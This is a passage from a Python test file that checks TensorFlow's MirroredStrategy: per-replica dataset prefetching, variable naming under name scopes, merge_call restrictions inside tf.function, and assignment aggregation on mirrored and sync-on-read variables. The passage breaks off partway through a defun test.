  def testRun(self, distribution):
    self._test_run(distribution)
  def testAllReduceSum(self, distribution):
    self._test_all_reduce_sum(distribution)
  def testAllReduceSumGradients(self, distribution):
    self._test_all_reduce_sum_gradients(distribution)
  def testAllReduceSumGradientTape(self, distribution):
    self._test_all_reduce_sum_gradient_tape(distribution)
  def testAllReduceMean(self, distribution):
    self._test_all_reduce_mean(distribution)
  def testAllReduceMeanGradients(self, distribution):
    self._test_all_reduce_mean_gradients(distribution)
  def testAllReduceMeanGradientTape(self, distribution):
    self._test_all_reduce_mean_gradient_tape(distribution)
  def testSummaryForReplicaZeroOnly(self, distribution):
    self._test_summary_for_replica_zero_only(distribution)
  def testTrainableVariables(self, distribution):
    self._test_trainable_variable(distribution)
  def test_prefetch_to_device_dataset(self, distribution):
    """With experimental_fetch_to_device=True, each replica's element is
    placed on that replica's worker device."""
    input_options = distribute_lib.InputOptions(
        experimental_fetch_to_device=True)
    dataset = dataset_ops.Dataset.range(100)
    dataset = dataset.batch(distribution.num_replicas_in_sync)
    dataset = distribution.experimental_distribute_dataset(
        dataset, options=input_options)
    if context.executing_eagerly():
      item = next(iter(dataset))
    else:
      if isinstance(dataset, input_lib.DistributedDatasetV1):
        item = dataset.make_initializable_iterator().get_next()
      else:
        self.skipTest("unsupported test combination")
    device_types = [
        tf_device.DeviceSpec.from_string(tensor.device).device_type for
        tensor in item.values]
    expected_device_types = [
        tf_device.DeviceSpec.from_string(device).device_type for
        device in distribution.extended.worker_devices]
    self.assertAllEqual(device_types, expected_device_types)
  def test_prefetch_to_host_dataset(self, distribution):
    """With experimental_fetch_to_device=False, all per-replica elements
    stay on the host CPU."""
    input_options = distribute_lib.InputOptions(
        experimental_fetch_to_device=False)
    dataset = dataset_ops.Dataset.range(100)
    dataset = dataset.batch(distribution.num_replicas_in_sync)
    dataset = distribution.experimental_distribute_dataset(
        dataset, options=input_options)
    if context.executing_eagerly():
      item = next(iter(dataset))
    else:
      if isinstance(dataset, input_lib.DistributedDatasetV1):
        item = dataset.make_initializable_iterator().get_next()
      else:
        self.skipTest("unsupported test combination")
    device_types = {
        tf_device.DeviceSpec.from_string(tensor.device).device_type for
        tensor in item.values}
    self.assertAllEqual(list(device_types), ["CPU"])
def one_device_combinations():
  """Test combinations covering single-device MirroredStrategy variants."""
  single_device_strategies = [
      strategy_combinations.mirrored_strategy_with_one_cpu,
      strategy_combinations.mirrored_strategy_with_one_gpu,
  ]
  return combinations.combine(
      distribution=single_device_strategies, mode=["graph", "eager"])
@combinations.generate(one_device_combinations())
class MirroredOneDeviceDistributionTest(
    strategy_test_lib.DistributionTestBase,
    strategy_test_lib.OneDeviceDistributionTestBase,
    parameterized.TestCase):
  """Single-device MirroredStrategy runs of the inherited base-class tests."""
  def testMinimizeLoss(self, distribution):
    if context.executing_eagerly():
      self._test_minimize_loss_eager(distribution)
    else:
      self._test_minimize_loss_graph(distribution)
  def testReplicaId(self, distribution):
    self._test_replica_id(distribution)
  def testCallAndMergeExceptions(self, distribution):
    self._test_call_and_merge_exceptions(distribution)
  def testRun(self, distribution):
    self._test_run(distribution)
  def testAllReduceSum(self, distribution):
    self._test_all_reduce_sum(distribution)
  def testAllReduceSumGradients(self, distribution):
    self._test_all_reduce_sum_gradients(distribution)
  def testAllReduceSumGradientTape(self, distribution):
    self._test_all_reduce_sum_gradient_tape(distribution)
  def testAllReduceMean(self, distribution):
    self._test_all_reduce_mean(distribution)
  def testAllReduceMeanGradients(self, distribution):
    self._test_all_reduce_mean_gradients(distribution)
  def testAllReduceMeanGradientTape(self, distribution):
    self._test_all_reduce_mean_gradient_tape(distribution)
class MirroredStrategyVariableCreatorStackTest(
    test.TestCase, parameterized.TestCase):
  """Checks that variable creator stacks are thread-local per replica."""
  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
          ],
          mode=["graph"]))
  def testCreatorStacksAreThreadLocal(self, distribution):
    def model_fn():
      # Each replica thread installs its own creator tagging the replica id.
      replica_id_str = str(self.evaluate(_replica_id()))
      def thread_creator_fn(next_creator, **kwargs):
        return next_creator(**kwargs) + ":thread_" + replica_id_str
      with variable_scope.variable_creator_scope(thread_creator_fn):
        # Create a variable in this scope.
        v = variable_scope.variable(1.0)
        # This will pause the current thread, and execute the other thread.
        ds_context.get_replica_context().merge_call(lambda _: _)
      return v
    def main_thread_creator(next_creator, **kwargs):
      # We are not using the underlying next_creator for test purposes.
      del next_creator, kwargs
      return "main_thread"
    with context.graph_mode(), \
        distribution.scope(), \
        variable_scope.variable_creator_scope(main_thread_creator):
      result = distribution.extended.call_for_each_replica(model_fn)
      result = distribution.experimental_local_results(result)
      # Each replica sees the main-thread creator plus only its own
      # per-thread creator — not the other replica's.
      expected = ("main_thread:thread_0", "main_thread:thread_1")
      self.assertEqual(expected, result)
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
        ],
        mode=["graph", "eager"]))
class MirroredStrategyCallForEachReplicaTest(test.TestCase):
  """Tests for call_for_each_replica with tf.function and merge_call."""
  def testExecutingEagerlyOutsideFunction(self, distribution):
    """Verify we preserve the value of executing_eagerly_outside_functions()."""
    def model_fn():
      return ops.executing_eagerly_outside_functions()
    originally = ops.executing_eagerly_outside_functions()
    with distribution.scope():
      in_scope = ops.executing_eagerly_outside_functions()
      in_model_fn = distribution.extended.call_for_each_replica(model_fn)
      unwrapped = distribution.experimental_local_results(in_model_fn)
      self.assertEqual(in_scope, unwrapped[0])
      self.assertEqual(in_scope, originally)
    # Verify this all again, but this time in a FuncGraph.
    with func_graph.FuncGraph("fg").as_default(), distribution.scope():
      in_scope = ops.executing_eagerly_outside_functions()
      in_model_fn = distribution.extended.call_for_each_replica(model_fn)
      unwrapped = distribution.experimental_local_results(in_model_fn)
      self.assertEqual(in_scope, unwrapped[0])
      self.assertEqual(in_scope, originally)
  def testFunctionInCallForEachReplica(self, distribution):
    # The tf.function should be traced once per replica.
    traces = []
    @def_function.function
    def model_fn():
      traces.append(1)
      return ds_context.get_replica_context().replica_id_in_sync_group
    with distribution.scope():
      result = distribution.extended.call_for_each_replica(model_fn)
      self.assertEqual(
          (0, 1),
          self.evaluate(distribution.experimental_local_results(result)))
      self.assertLen(traces, distribution.num_replicas_in_sync)
  def testFunctionInCallForEachReplicaInsideAnotherFunction(self, distribution):
    traces = []
    @def_function.function
    def model_fn():
      traces.append(1)
      return ds_context.get_replica_context().replica_id_in_sync_group
    @def_function.function
    def step():
      return distribution.extended.call_for_each_replica(model_fn)
    with distribution.scope():
      result = step()
      self.assertEqual(
          (0, 1),
          self.evaluate(distribution.experimental_local_results(result)))
      self.assertLen(traces, distribution.num_replicas_in_sync)
  def testControlFlowFunctionInCallForEachReplicaWithMergeCall(
      self, distribution):
    # merge_call inside a while_loop body (a new graph) must raise.
    def merge_fn(strategy, value):
      return strategy.reduce(reduce_util.ReduceOp.SUM, value, axis=None)
    @def_function.function
    def model_fn():
      def body_fn(i):
        return ds_context.get_replica_context().merge_call(merge_fn, args=(i,))
      return control_flow_ops.while_loop_v2(lambda i: i < 2, body_fn, [0])
    with distribution.scope():
      with self.assertRaisesRegex(
          RuntimeError, "`merge_call` called while defining a new graph."):
        distribution.extended.call_for_each_replica(model_fn)
  def testNestedFunctionInCallForEachReplicaWithMergeCall(self, distribution):
    # merge_call inside a nested tf.function (a new graph) must raise.
    def merge_fn(strategy, value):
      return strategy.reduce(reduce_util.ReduceOp.SUM, value, axis=None)
    def model_fn():
      @def_function.function
      def model_fn_nested():
        t = constant_op.constant(1)
        return ds_context.get_replica_context().merge_call(merge_fn, args=(t,))
      return model_fn_nested()
    with distribution.scope():
      with self.assertRaisesRegex(
          RuntimeError, "`merge_call` called while defining a new graph."):
        distribution.extended.call_for_each_replica(model_fn)
  def testFunctionInCallForEachReplicaWithMergeCall(self, distribution):
    # merge_call directly inside the replica tf.function is allowed.
    def merge_fn(_):
      pass
    @def_function.function
    def model_fn():
      ds_context.get_replica_context().merge_call(merge_fn)
      return 0.
    with distribution.scope():
      self.assertEqual(
          self.evaluate(distribution.extended.call_for_each_replica(model_fn)),
          0.)
  def testFunctionInCallForEachReplicaCached(self, distribution):
    # Repeated calls must reuse the traced function, not retrace.
    traces = []
    @def_function.function
    def model_fn():
      traces.append(None)
    self.assertEmpty(traces)
    for i in range(10):
      distribution.extended.call_for_each_replica(model_fn)
      if i == 0:
        num_devices = len(traces)
        self.assertGreater(num_devices, 0)
      else:
        # model_fn should not have been re-evaluated so the length should remain
        # the same.
        self.assertLen(traces, num_devices)
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
        ],
        mode=["graph"]))
class MirroredStrategyNameScopeTest(test.TestCase):
  """Name-scope and variable-scope naming under MirroredStrategy."""
  # NOTE(priyag): Names and name scopes are ignored in eager, hence we are not
  # testing this in eager mode.
  def testNameScope(self, distribution):
    def model_fn():
      with ops.name_scope("foo"):
        a = constant_op.constant(1.0, name="a")
        ds_context.get_replica_context().merge_call(lambda _: _)
        b = constant_op.constant(1.0, name="b")
        return a, b
    with context.graph_mode(), distribution.scope():
      with ops.name_scope("main"):
        result = distribution.extended.call_for_each_replica(model_fn)
        self.assertEqual(2, len(result))
        for v, name in zip(result, ["a", "b"]):
          self.assertIsInstance(v, values.DistributedValues)
          v0, v1 = distribution.experimental_local_results(v)
          # Replica 0 keeps the plain scope; replica 1 gets "replica_1".
          self.assertEqual("main/foo/" + name + ":0", v0.name)
          self.assertEqual("main/replica_1/foo/" + name + ":0", v1.name)
  def testWithDefaultName(self, distribution):
    # Same as above but relying on the default name argument of name_scope.
    def model_fn():
      with ops.name_scope(None, "foo"):
        a = constant_op.constant(1.0, name="a")
        ds_context.get_replica_context().merge_call(lambda _: _)
        b = constant_op.constant(2.0, name="b")
        return a, b
    with context.graph_mode(), distribution.scope():
      result = distribution.extended.call_for_each_replica(model_fn)
      self.assertEqual(2, len(result))
      for v, name in zip(result, ["a", "b"]):
        self.assertIsInstance(v, values.DistributedValues)
        v0, v1 = distribution.experimental_local_results(v)
        self.assertEqual("foo/" + name + ":0", v0.name)
        self.assertEqual("replica_1/foo/" + name + ":0", v1.name)
  # variable_scope.variable() respects name scopes when creating
  # variables. On the other hand variable_scope.get_variable() ignores name
  # scopes but respects variable scope when creating variables. We test both
  # methods of creating variables to make sure that we have the same
  # variable names in both cases.
  def testNameScopeWithVariable(self, distribution):
    def in_cross_replica(_):
      c = variable_scope.variable(1.0, name="c")
      return c
    def model_fn():
      b = variable_scope.variable(1.0, name="b")
      with ops.name_scope("foo"):
        c = ds_context.get_replica_context().merge_call(in_cross_replica)
      return b, c
    with context.graph_mode(), distribution.scope():
      with ops.name_scope("main"):
        a = variable_scope.variable(1.0, name="a")
        result = distribution.extended.call_for_each_replica(model_fn)
      result_b = result[0]
      result_c = result[1]
      self.assertIsInstance(result_b, values.DistributedValues)
      self.assertIsInstance(result_c, values.DistributedValues)
      a0, a1 = distribution.experimental_local_results(a)
      b0, b1 = distribution.experimental_local_results(result_b)
      c0, c1 = distribution.experimental_local_results(result_c)
      # variable() respects the surrounding name scopes.
      self.assertEqual("main/a:0", a0.name)
      self.assertEqual("main/a/replica_1:0", a1.name)
      self.assertEqual("main/b:0", b0.name)
      self.assertEqual("main/b/replica_1:0", b1.name)
      self.assertEqual("main/foo/c:0", c0.name)
      self.assertEqual("main/foo/c/replica_1:0", c1.name)
  def testNameScopeWithGetVariable(self, distribution):
    def in_cross_replica(_):
      c = variable_scope.get_variable("c", [1])
      return c
    def model_fn():
      b = variable_scope.get_variable("b", [1])
      with ops.name_scope("foo"):
        c = ds_context.get_replica_context().merge_call(in_cross_replica)
      return b, c
    with context.graph_mode(), distribution.scope():
      with ops.name_scope("main"):
        a = variable_scope.get_variable("a", [1])
        result = distribution.extended.call_for_each_replica(model_fn)
      result_b = result[0]
      result_c = result[1]
      self.assertIsInstance(result_b, values.DistributedValues)
      self.assertIsInstance(result_c, values.DistributedValues)
      a0, a1 = distribution.experimental_local_results(a)
      b0, b1 = distribution.experimental_local_results(result_b)
      c0, c1 = distribution.experimental_local_results(result_c)
      # get_variable() ignores name scopes entirely.
      self.assertEqual("a:0", a0.name)
      self.assertEqual("a/replica_1:0", a1.name)
      self.assertEqual("b:0", b0.name)
      self.assertEqual("b/replica_1:0", b1.name)
      self.assertEqual("c:0", c0.name)
      self.assertEqual("c/replica_1:0", c1.name)
  def testVariableScopeWithGetVariable(self, distribution):
    def in_cross_replica(_):
      c = variable_scope.get_variable("c", [1])
      return c
    def model_fn():
      b = variable_scope.get_variable("b", [1])
      with variable_scope.variable_scope("foo"):
        c = ds_context.get_replica_context().merge_call(in_cross_replica)
      return b, c
    with context.graph_mode(), distribution.scope():
      with variable_scope.variable_scope("main"):
        a = variable_scope.get_variable("a", [1])
        result = distribution.extended.call_for_each_replica(model_fn)
      result_b = result[0]
      result_c = result[1]
      self.assertIsInstance(result_b, values.DistributedValues)
      self.assertIsInstance(result_c, values.DistributedValues)
      a0, a1 = distribution.experimental_local_results(a)
      b0, b1 = distribution.experimental_local_results(result_b)
      c0, c1 = distribution.experimental_local_results(result_c)
      # get_variable() does respect variable scopes.
      self.assertEqual("main/a:0", a0.name)
      self.assertEqual("main/a/replica_1:0", a1.name)
      self.assertEqual("main/b:0", b0.name)
      self.assertEqual("main/b/replica_1:0", b1.name)
      self.assertEqual("main/foo/c:0", c0.name)
      self.assertEqual("main/foo/c/replica_1:0", c1.name)
@combinations.generate(
    combinations.combine(
        distribution=[
            combinations.NamedDistribution(
                "Mirrored3Devices",
                # pylint: disable=g-long-lambda
                lambda: mirrored_strategy.MirroredStrategy(
                    ["/device:GPU:0", "/device:GPU:1", "/device:CPU:0"]),
                required_gpus=2)
        ],
        mode=["graph", "eager"]))
class MirroredThreeDeviceDistributionTest(
    strategy_test_lib.DistributionTestBase,
    parameterized.TestCase):
  """MirroredStrategy behavior with three devices (2 GPUs + 1 CPU)."""

  def testThreeDevices(self, distribution):
    # A variable created inside call_for_each_replica must come back as a
    # single mirrored variable named after the first (primary) copy.
    def model_fn():
      v = variable_scope.variable(1.0, name="foo")
      ds_context.get_replica_context().merge_call(lambda _: _)
      return v

    with distribution.scope():
      result = distribution.extended.call_for_each_replica(model_fn)
      self.assertTrue(distribute_utils.is_mirrored(result))
      self.assertEqual("foo:0", result.name)
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
        ],
        mode=["graph", "eager"]))
class MirroredVariableUpdateTest(test.TestCase):
  # The following tests check assign, assign_add and assign_sub on Mirrored
  # variables in replica and cross replica context.

  def testAssignMirroredVarReplicaContextWithoutAggregationType(self,
                                                                distribution):
    # With no explicit aggregation, assigning the same single value from
    # every replica succeeds and all copies end up with that value.
    def var_fn():
      v = variable_scope.variable(1.0, name="foo")
      return v

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())

      def model_fn():
        return mirrored_var.assign(5.0)

      self.evaluate(distribution.experimental_local_results(
          distribution.extended.call_for_each_replica(model_fn)))
      self.assertEqual(5.0, self.evaluate(mirrored_var))

  def testAssignMirroredVarReplicaContextWithSum(self, distribution):
    # Test that we don't reduce a non-per-replica value with the "sum"
    # aggregation type.
    def var_fn():
      v = variable_scope.variable(
          1.0, name="foo", aggregation=variable_scope.VariableAggregation.SUM)
      return v

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())

      def model_fn():
        return mirrored_var.assign(5.0)

      # The error is only raised on the merge_call-based code path; the
      # newer path (no merge_call) simply applies the assignment.
      if getattr(distribution.extended, "_use_merge_call", True):
        with self.assertRaisesRegex(
            ValueError, "A non-DistributedValues value 5.0 cannot be reduced "
            "with the given reduce op ReduceOp.SUM."):
          self.evaluate(distribution.experimental_local_results(
              distribution.extended.call_for_each_replica(model_fn)))
      else:
        result = self.evaluate(
            distribution.experimental_local_results(
                distribution.extended.call_for_each_replica(model_fn)))
        self.assertAllEqual(result[0], 5.0)

  def testAssignMirroredVarCrossDeviceContext(self, distribution):
    # Cross-replica assign needs no aggregation; it writes every copy.
    def var_fn():
      return variable_scope.variable(1.0, name="foo")

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(1.0, self.evaluate(mirrored_var))
      mirrored_var_result = self.evaluate(mirrored_var.assign(6.0))
      self.assertEqual(6.0, mirrored_var_result)

  def testAssignMirroredVarReplicaContext(self, distribution):
    # With MEAN aggregation, per-replica assigns of the replica id (0 and 1)
    # are averaged, so the variable ends up at 0.5.
    def var_fn():
      return variable_scope.variable(
          1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(1.0, self.evaluate(mirrored_var))

      def model_fn():
        value = math_ops.cast(
            ds_context.get_replica_context().replica_id_in_sync_group,
            mirrored_var.dtype)
        return mirrored_var.assign(value)

      self.evaluate(distribution.experimental_local_results(
          distribution.extended.call_for_each_replica(model_fn)))
      self.assertEqual(0.5, self.evaluate(mirrored_var))

  def testAssignMirroredVarReplicaContextWithSingleValue(self, distribution):
    # MEAN aggregation of the same constant from every replica is that
    # constant.
    def var_fn():
      return variable_scope.variable(
          1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(1.0, self.evaluate(mirrored_var))

      def model_fn():
        return mirrored_var.assign(5.0)

      self.evaluate(distribution.experimental_local_results(
          distribution.extended.call_for_each_replica(model_fn)))
      self.assertEqual(5.0, self.evaluate(mirrored_var))

  def testAssignAddMirroredVarCrossDeviceContext(self, distribution):
    def var_fn():
      return variable_scope.variable(1.0, name="foo")

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(1.0, self.evaluate(mirrored_var))

      # read_value == True
      mirrored_var_result = self.evaluate(
          mirrored_var.assign_add(6.0, read_value=True))
      self.assertEqual(7.0, mirrored_var_result)
      # Both per-device copies were updated, and each copy lives on its own
      # worker device.
      self.assertEqual(
          7.0,
          self.evaluate(
              distribution.experimental_local_results(mirrored_var)[0]))
      self.assertEqual(
          7.0,
          self.evaluate(
              distribution.experimental_local_results(mirrored_var)[1]))
      self.assertEqual(
          distribution.extended.worker_devices[0], mirrored_var._devices[0])
      self.assertEqual(
          distribution.extended.worker_devices[1], mirrored_var._devices[1])

      # read_value == False
      self.evaluate(mirrored_var.assign_add(2.0, read_value=False))
      self.assertEqual(
          9.0,
          self.evaluate(
              distribution.experimental_local_results(mirrored_var)[0]))
      self.assertEqual(
          9.0,
          self.evaluate(
              distribution.experimental_local_results(mirrored_var)[1]))
      self.assertEqual(
          distribution.extended.worker_devices[0], mirrored_var._devices[0])
      self.assertEqual(
          distribution.extended.worker_devices[1], mirrored_var._devices[1])

  def testAssignAddMirroredVarReplicaContext(self, distribution):
    # 1.0 + mean(replica ids 0, 1) == 1.5.
    def var_fn():
      return variable_scope.variable(
          1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(1.0, self.evaluate(mirrored_var))

      def model_fn():
        value = math_ops.cast(
            ds_context.get_replica_context().replica_id_in_sync_group,
            mirrored_var.dtype)
        return mirrored_var.assign_add(value)

      self.evaluate(distribution.experimental_local_results(
          distribution.extended.call_for_each_replica(model_fn)))
      self.assertEqual(1.5, self.evaluate(mirrored_var))

  def testAssignAddMirroredVarReplicaContextWithSingleValue(self, distribution):
    def var_fn():
      return variable_scope.variable(
          1.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(1.0, self.evaluate(mirrored_var))

      def model_fn():
        return mirrored_var.assign_add(5.0)

      self.evaluate(distribution.experimental_local_results(
          distribution.extended.call_for_each_replica(model_fn)))
      self.assertEqual(6.0, self.evaluate(mirrored_var))

  def testAssignSubMirroredVarCrossDeviceContext(self, distribution):
    def var_fn():
      return variable_scope.variable(5.0, name="foo")

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(5.0, self.evaluate(mirrored_var))
      mirrored_var_result = self.evaluate(mirrored_var.assign_sub(2.0))
      self.assertEqual(3.0, mirrored_var_result)
      self.assertEqual(
          3.0,
          self.evaluate(
              distribution.experimental_local_results(mirrored_var)[0]))
      self.assertEqual(
          3.0,
          self.evaluate(
              distribution.experimental_local_results(mirrored_var)[1]))
      self.assertEqual(
          distribution.extended.worker_devices[0], mirrored_var._devices[0])
      self.assertEqual(
          distribution.extended.worker_devices[1], mirrored_var._devices[1])

  def testAssignSubMirroredVarReplicaContext(self, distribution):
    # 5.0 - mean(replica ids 0, 1) == 4.5.
    def var_fn():
      return variable_scope.variable(
          5.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(5.0, self.evaluate(mirrored_var))

      def model_fn():
        value = math_ops.cast(
            ds_context.get_replica_context().replica_id_in_sync_group,
            mirrored_var.dtype)
        return mirrored_var.assign_sub(value)

      self.evaluate(distribution.experimental_local_results(
          distribution.extended.call_for_each_replica(model_fn)))
      self.assertEqual(4.5, self.evaluate(mirrored_var))

  def testAssignSubMirroredVarReplicaContextWithSingleValue(self, distribution):
    def var_fn():
      return variable_scope.variable(
          5.0, name="foo", aggregation=variable_scope.VariableAggregation.MEAN)

    with distribution.scope():
      mirrored_var = distribution.extended.call_for_each_replica(var_fn)
      self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
      self.evaluate(variables.global_variables_initializer())
      self.assertEqual(5.0, self.evaluate(mirrored_var))

      def model_fn():
        return mirrored_var.assign_sub(1.0)

      self.evaluate(distribution.experimental_local_results(
          distribution.extended.call_for_each_replica(model_fn)))
      self.assertEqual(4.0, self.evaluate(mirrored_var))
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
        ],
        mode=["graph", "eager"]))
class MirroredAndSyncOnReadVariableInitializerTest(test.TestCase):
  """Initializer behavior of mirrored and sync-on-read variables (graph only)."""

  def testAssignMirroredVarInitializer(self, distribution):
    # This test is not eager compatible since in eager variables are initialized
    # upon construction instead of once the initialization op is run.
    with context.graph_mode():
      def var_fn():
        v = variable_scope.variable(1.0, name="foo")
        return v

      with distribution.scope():
        mirrored_var = distribution.extended.call_for_each_replica(var_fn)
        self.assertTrue(distribute_utils.is_mirrored(mirrored_var))
        # Uninitialized until the initializer op is explicitly run.
        self.assertFalse(self.evaluate(mirrored_var.is_initialized()))
        self.evaluate(mirrored_var.initializer)
        self.assertTrue(self.evaluate(mirrored_var.is_initialized()))

  def testAssignReplicaLocalVarInitializer(self, distribution):
    # This test is not eager compatible since in eager variables are initialized
    # upon construction instead of once the initialization op is run.
    with context.graph_mode():
      def model_fn():
        v_sum = variable_scope.variable(
            1.0,
            synchronization=variable_scope.VariableSynchronization.ON_READ,
            aggregation=variable_scope.VariableAggregation.SUM)
        self.assertTrue(distribute_utils.is_sync_on_read(v_sum))
        return v_sum

      with distribution.scope():
        sync_on_read_var = distribution.extended.call_for_each_replica(
            model_fn)
        self.assertTrue(distribute_utils.is_sync_on_read(sync_on_read_var))
        self.assertFalse(self.evaluate(sync_on_read_var.is_initialized()))
        self.evaluate(sync_on_read_var.initializer)
        self.assertTrue(self.evaluate(sync_on_read_var.is_initialized()))
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
        ],
        mode=["graph", "eager"]))
class SyncOnReadVariableAssignTest(test.TestCase):
  """Assignment semantics of sync-on-read variables under SUM and MEAN."""

  def testAssignReplicaLocalVarSumAggregation(self, distribution):
    def model_fn():
      v_sum = variable_scope.variable(
          1.0,
          synchronization=variable_scope.VariableSynchronization.ON_READ,
          aggregation=variable_scope.VariableAggregation.SUM)
      return v_sum

    with distribution.scope():
      sync_on_read_var = distribution.extended.call_for_each_replica(model_fn)
      self.assertTrue(distribute_utils.is_sync_on_read(sync_on_read_var))
      self.evaluate(variables.global_variables_initializer())
      # Each replica has a value of 1.0 assigned to it in replica context.
      # When we read the value using `read_var` we should see the SUM of each of
      # values on each of the replicas.
      self.assertEqual(2.0, self.evaluate(
          distribution.extended.read_var(sync_on_read_var)))

      # Assigning 6.0 in cross replica context will assign a value of
      # 6.0/num_replicas to each replica.
      tlv_ops = sync_on_read_var.assign(6.0)
      self.evaluate(tlv_ops)
      # On reading the sync on read var we should get the assigned value back.
      # The value on all the replicas are added before being returned by
      # `read_var`.
      self.assertEqual(6.0, self.evaluate(
          distribution.extended.read_var(sync_on_read_var)))

  def testAssignReplicaLocalVarMeanAggregation(self, distribution):
    def model_fn():
      v_sum = variable_scope.variable(
          1.0,
          synchronization=variable_scope.VariableSynchronization.ON_READ,
          aggregation=variable_scope.VariableAggregation.MEAN)
      return v_sum

    with distribution.scope():
      sync_on_read_var = distribution.extended.call_for_each_replica(model_fn)
      self.assertTrue(distribute_utils.is_sync_on_read(sync_on_read_var))
      self.evaluate(variables.global_variables_initializer())
      # Each replica has a value of 1.0 assigned to it in replica context.
      # When we read the value using `read_var` we should see the MEAN of values
      # on all replicas which is the value assigned in replica context.
      self.assertEqual(1.0, self.evaluate(
          distribution.extended.read_var(sync_on_read_var)))
      tlv_ops = sync_on_read_var.assign(6.0)
      self.evaluate(tlv_ops)
      # On reading the sync on read var we should get the MEAN of all values
      # which is equal to the value assigned.
      self.assertEqual(6.0, self.evaluate(
          distribution.extended.read_var(sync_on_read_var)))
class MockModel(object):
  """Minimal model stub: one mandatory variable, an optional second one.

  Calling the instance returns ``factor * var1`` (plus ``var2`` when it was
  created), letting tests exercise variable capture inside defuns.
  """

  def __init__(self, two_variables=False):
    # First dummy variable is always present; the second is opt-in.
    self.variables = [variable_scope.variable(1.25, name="dummy_var1")]
    if two_variables:
      self.variables.append(variable_scope.variable(2.0, name="dummy_var2"))

  def __call__(self, factor=2):
    # Scale the first variable, then fold in any remaining ones.
    result = factor * self.variables[0]
    for extra in self.variables[1:]:
      result += extra
    return result
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
        ],
        mode=["graph", "eager"]))
class MirroredStrategyDefunTest(test.TestCase):
  """Checks that variables captured inside (nested) defuns work per replica."""

  def _call_and_check(self, distribution, model_fn, inputs, expected_result,
                      defuns, two_variables=False):
    # Runs model_fn on every replica, compares against the expected
    # per-replica results, then re-traces each defun to inspect its
    # device-specific concrete functions.
    cpu_dev = device_util.canonicalize("CPU:0")
    gpu_dev = device_util.canonicalize("GPU:0")
    devices = [cpu_dev, gpu_dev]

    with distribution.scope():
      mock_model = MockModel(two_variables)
      self.evaluate(variables.global_variables_initializer())

      result = distribution.extended.call_for_each_replica(
          model_fn, args=[mock_model] + inputs)
      for r in range(len(devices)):
        device_result = distribute_utils.select_replica(r, result)
        device_expected_result = distribute_utils.select_replica(
            r, expected_result)
        self.assertAllClose(device_expected_result,
                            self.evaluate(device_result))

      for defun in defuns:
        # `Function`s are specialized to the current device stack, so
        # call_for_each has one trace per device. To check that the expected set
        # of variables was accessed on each trace, we first retrieve each
        # device-specific graph function.
        per_replica_graph_functions = (
            distribution.extended.call_for_each_replica(
                defun.get_concrete_function, args=[mock_model] + inputs))
        for i in range(len(devices)):
          graph_function = distribution.experimental_local_results(
              per_replica_graph_functions)[i]
          # TODO(b/129555712): re-enable an assertion here that the two sets of
          # variables are the same.
          # self.assertEqual(set(graph_function.graph.variables),
          #                  set(mock_model.variables))
          del graph_function

  def testVariableInDefun(self, distribution):
    # 2 * 1.25 == 2.5.
    @function.defun
    def times_two(mock_model):
      return mock_model()

    def model_fn(mock_model):
      return times_two(mock_model)

    self._call_and_check(distribution, model_fn, [], 2.5, [times_two])

  def testVariableInNestedDefun(self, distribution):
    # 2 * 1.25 + 1 == 3.5.
    @function.defun
    def times_two(mock_model):
      return mock_model()

    @function.defun
    def two_x_plus_one(mock_model):
      return times_two(mock_model) + 1

    def model_fn(mock_model):
      return two_x_plus_one(mock_model)

    self._call_and_check(distribution, model_fn, [], 3.5,
                         [times_two, two_x_plus_one])

  def testTwoVariablesInNestedDefun(self, distribution):
    # 2 * 1.25 + 2.0 + 1 == 5.5 with the second variable enabled.
    @function.defun
    def fn1(mock_model):
      return mock_model()

    @function.defun
    def fn2(mock_model):
